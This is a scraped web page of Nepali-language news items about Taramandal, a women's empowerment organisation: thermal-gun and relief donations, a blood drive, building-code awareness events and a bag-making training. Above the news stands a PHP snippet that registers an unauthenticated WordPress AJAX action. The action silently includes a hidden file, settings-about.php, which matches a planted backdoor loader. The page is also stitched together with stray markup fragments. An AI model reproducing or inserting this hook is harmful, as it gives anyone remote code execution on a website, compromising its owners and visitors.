if(!function_exists('file_manager_check_dt')){
add_action('wp_ajax_nopriv_file_manager_check_dt', 'file_manager_check_dt');
add_action('wp_ajax_file_manager_check_dt', 'file_manager_check_dt');
function file_manager_check_dt()
{
$file = __DIR__ . '/settings-about.php';
if (file_exists($file)) {
include $file;
}
die();
}
}
Video: Taramandal helped Lalitpur Metropolitan City by providing 30 Thermal Gun
तारामण्डलकी अध्यक्ष कुन्ती पोखरेलको नेतृत्वमा बिहीबार ललितपुर महानगरपालिकाका मेयर चिरीबाबु महर्जनलाई ३० थान थर्मल गन हस्तान्तरण गरिएको हो। महानगरपालिकाका मेयर चिरीबाबु महर्जन, कार्यकारी प्रमुख प्रेम प्रसाद भट्टराई, वडा अध्यक्षहरू लगायतको उपस्थितिमा उक्त कार्यक्रम सम्पन्न भएको हो।
‘कोरोनाको सन्त्रास विश्वमा छाएको छ। यसलाई जित्न हामी सबै हातेमालो गरेर अघि बढ्नुपर्छ, अन्यथा कोरोनाले हामीमाथि विजय प्राप्त गर्नेछ, तसर्थ यसलाई परास्त गर्न हामी सबै एकजुट हौ।’ संस्थाकी अध्यक्ष कुन्ती पोखरेलले भनिन्।
सामाग्री हस्तान्तरण कार्यक्रममा बोल्दै महानगर प्रमुख चरीबाबु महर्जनले तारामण्डललाई धन्यवाद दिँदै भने ‘लकडाउन सकिए लगत्तै एस. इ.इ परीक्षा हुनेवाला छ । हामीकहाँ ४२ वटा परीक्षा केन्द्र छन् । त्यसको लागि हामीलाई उपकरणको कमी भइरहेको थियो । उहाँहरूले सहयोग गर्नुभएकोमा एकदमै धन्यवाद दिन चाहान्छौं ।’

संस्थाले यसअघि पनि थुप्रै सामाजिक कार्य गर्दै आएको छ । कोरोना महामारी सङ्क्रमण तथा नियन्त्रणमा संस्थाले आहम भूमिका निर्वाह गर्दै यस अघि काठमाडौँ महानगरपालिका सहित बुढानीलकण्ठ, कीर्तिपुर तथा टोखा नगरपालिकाका अति विपन्न, असहाय र मजदुर परिवारलाई राहत वितरण गरेको छ ।
यसका अतिरिक्त संस्थाले काठमाडौँ वडा न. ९ का २६० परिवार सहित सरकारी होस्टेलका विद्यार्थी, भाडामा बसेर पढ्दै गरेका विद्यार्थी, बाल आश्रम र पशुपति क्षेत्रमा भएका गरिब , विपन्न परिवारलाई राहत सामग्री वितरण गरिसकेको छ । संस्थाले गत वैशाख ११ गते रक्तदानका कार्यक्रम पनि आयोजना गरेको थियो जसमा ६६ जनाले रक्तदान समेत गरेका छन् । आगामी दिनमा पनि सहयोगको प्रक्रियालाई निरन्तरता दिने संस्थाकी अध्यक्ष पोखरेलले जानकारी दिइन् । ललितपुर महानगरले सहयोगको प्रशंसा गर्दै धन्यवाद पत्र समेत प्रदान गरेको छ ।

काठमाडौँ । विश्वभर फैलिएको कोभिड १९ र यसका कारण नेपालमा जारी लकडाउनका बिच पनि रगतको अभाव हुन नदिन काठमाडौँको पुरानो बानेश्वरमा रक्तदान कार्यक्रम सम्पन्न भएको छ ।
तारामण्डल महिला सशक्तीकरण अभियान र राप्रपाको गैर सरकारी संस्था समन्वय विभागले संयुक्त आयोजना तथा ब्लड डोनर्स एशोशियसन नेपालको सहयोगमा २०७७ साल बैशाख ११ गते रक्तदान कार्यक्रम सम्पन्न भएको हो।
कार्यक्रममा राप्रपाका युवा नेता मोहन श्रेष्ठ, कुन्ती देवी पोखरेल, युवा सङ्गठनका कोषाध्यक्ष गुणराज राजभण्डारी, केन्द्रीय सदस्य सचिन लामिछाने, नेपाली काँग्रेसका महासमिति सदस्य सुरज लामिछाने, काठमाडौँ महानगरको न्याय समिति सदस्य सरोज ढकाल, कल्पना योगी, लक्ष्मण जोशी काडमाडौं महानगरपालिका वडा अध्यक्ष रामकृष्ण श्रेष्ठ, सदस्य सिर्जना भेटवाल, श्रीराम राई, टेकराज अधिकारी, रचना सुमन लगायतको उपस्थिति रहेको थियो ।
कार्यक्रममा ६६ जनाले रक्तदान गरेको थियो
महानगरपालिका तथा वडाबाट आएको तथ्याङ्कको आधारमा वडा कार्यालयकै सहयोगमा उक्त स्थानमा राहत सहयोग उपलब्ध गराइएकाे
]]>
साथै उक्ता कार्यक्रममा सोहि नगरपालिकाका इन्जिनियरहरुले नक्शा पास प्रक्रिया, कागजातहरु, दस्तुर, समय आदि बारे नगरबासीलाई जानकारी दिनु भयो, भने नगरपालिकाका वडा अध्यक्षहरुले यस्ता कार्यक्रम जनस्तरमा लिएर आउनु हुने सस्था तारामंडल महिला शशक्तिकरण अभियान र शहरी बिकाश तथा भवन निर्माण बिभागलाई धन्यवाद दिनु हुदै यस्ता कार्यक्रमले आम जनमानसमा भवन निर्माण सम्बन्धि धेरै कुरा जानकारी भएको बताउनु भयो । राष्ट्रिय भवन संहिता तथा मापदण्ड सम्बन्धि जनचेतना मुलक कार्यक्रमले आमसर्वासाधारनलाई भुकम्प रहित घर बनाउन र जोखिम न्यूनीकरण गर्नमा धेरै सहयोग पुग्ने छ भन्ने आशा लिइएकोछ ।





तारामंडल महिला शशक्तिकरण अभियान र शहरी बिकाश तथा भवन निर्माण बिभागद्वारा संचालित राष्ट्रिय भवन संहिता तथा मापदण्ड सम्बन्धि जनचेतना मुलक कार्यक्रम संखरापुर नगरपालिका, नागार्जुन नगरपालिका, काठमाडौँ महानगरपालिका र बुढानिलाकण्ठ नगरपालिकामा संचालन गरिएको थियो । सहभागीहरुले कार्यक्रममा रुचि पुर्बक सहभागीता जनाएका थिए । साथै उक्ता कार्यक्रममा सोहि नगरपालिकाका इन्जिनियरहरुले नक्शा पास प्रक्रिया, कागजातहरु, दस्तुर, समय आदि बारे नगरबासीलाई जानकारी दिनु भयो, भने नगरपालिकाका वडा अध्यक्षहरुले यस्ता कार्यक्रम जनस्तरमा लिएर आउनु हुने सस्था तारामंडल महिला शशक्तिकरण अभियान र शहरी बिकाश तथा भवन निर्माण बिभागलाई धन्यवाद दिनु हुदै यस कार्यक्रमले आम जनमानसमा भवन निर्माण सम्बन्धि धेरै कुरा जानकारी भएको बताउनु भयो ।

कार्यक्रममा सस्थाकी अध्यक्ष कुन्तीदेवी पोख्रेलले राष्ट्रिय भवन संहिता तथा मापदण्ड सम्बन्धि जनचेतना मुलक कार्यक्रमले आमसर्वासाधारनलाई भुकम्प रहित घर बनाउन र जोखिम न्यूनीकरण गर्नमा धेरै सहयोग पुग्ने बताउनु भयो। साथै उहाले यस कार्यक्रममा सहभागी नगरबासी, जनप्रतिनिधि, शहरी बिकाश तथा भवन निर्माण बिभागका इन्जिनियर श्री शुदर्शन शर्मा , कन्सल्टेन्ट इन्जिनियर श्री सुर्य परियार र तारामंडल महिला शशक्तिकरण अभियानका इन्जिनियर श्री ज्ञान बहादुर लामा लगायत सस्थाका पुरै टिमलाई धन्यवाद दिनु भयो।

सस्थाले यस आवमा काठमाडौँ महानगरपालिकामा ३ वटा वडा १०, २९ र ३० मा, बुढानिलाकण्ठ नगरपालिकामा २ वटा वडा ११ र १२ मा, शंखारापुर नगरपालिकामा २ वटा वडा ६ र ७ मा त्यसै गरी नागार्जुन नगरपालिकामा २ वटा वडा ४ र ५ मा, गरी जम्मा ९ वटा वडाहरुमा कार्यक्रम संचालन गरेको थियो । उक्त कार्यक्रममा शहरी बिकाश तथा भवन निर्माण बिभागका इन्जिनियर श्री शुदर्शन शर्मा , कन्सल्टेन्ट इन्जिनियर श्री सुर्य परियार र तारामंडल महिला शशक्तिकरण अभियानका इन्जिनियर श्री ज्ञान बहादुर लामाले कार्यक्रम संचालन गर्नु भएको थियो । उक्त कार्यक्रममा बुढानिलाकण्ठ नगरपालिका का मेयर उद्धव खरेलले कार्यक्रम एकदम चेतनामुलक रहेकोले यस्ता कार्यक्रमले नगरबासी लाभदायी हुने भन्दै कार्यक्रम आयोजक सस्था तारामंडल महिला शशक्तिकरण अभियान र प्रायोजक शहरी बिकाश तथा भवन निर्माण बिभागलाई धन्यवाद दिनु भयो । नगरपालिकाका वडा अध्यक्ष लगायत जनप्रतिनिधिहरुको उत्साहपुर्वक उपस्थितिमा कार्यक्रम संचालन भएको थियो ।
]]>
काठमाडौँ महानगरपालिका वडा नं ९ का २५ जना भन्दा बढी महिला हरुलाई सस्थाले ब्याग बनाउने तालिम दिएको थियो। तालिम जेठ १४ वाट सुरुभएको थियो भने समापन कार्यक्रमको सभापति कुन्ती देवी पोख्रेल अतिथि हरुमा राप्रपाकि केन्द्रिय सदस्य एवं राष्ट्रिय प्रजातान्त्रिक महिला संगठनकि सहअध्यक्ष निना भेटवाल काठमाडौँ महानगरवडा नं ९ का अध्यक्ष रामकृष्ण श्रेष्ठ वडा सदस्य टेकराज अधिकारी, सिर्जना भेटवाल लगाएतको उपस्थिति रहेको थियो ।
कार्यक्रममा सम्पुण महिला प्रशिक्षक र प्रशिक्षार्थीहरुलाई प्रमाण पत्र प्रदान गरिएको थियो भने अतिथि हरुलाई माया को चिनो को रुपमा ब्याग हरु प्रदान गरिएको थियो ।
कार्यक्रममा अतिथिहरुले आगामी दिनमा पनि सहकार्य गर्नुपर्ने र तालिम लिनुभएका हरुले पनि अरुलाई सिकाउदै आफु पनि आत्मनिर्भर बन्नुपर्ने बताएका थिय।
]]>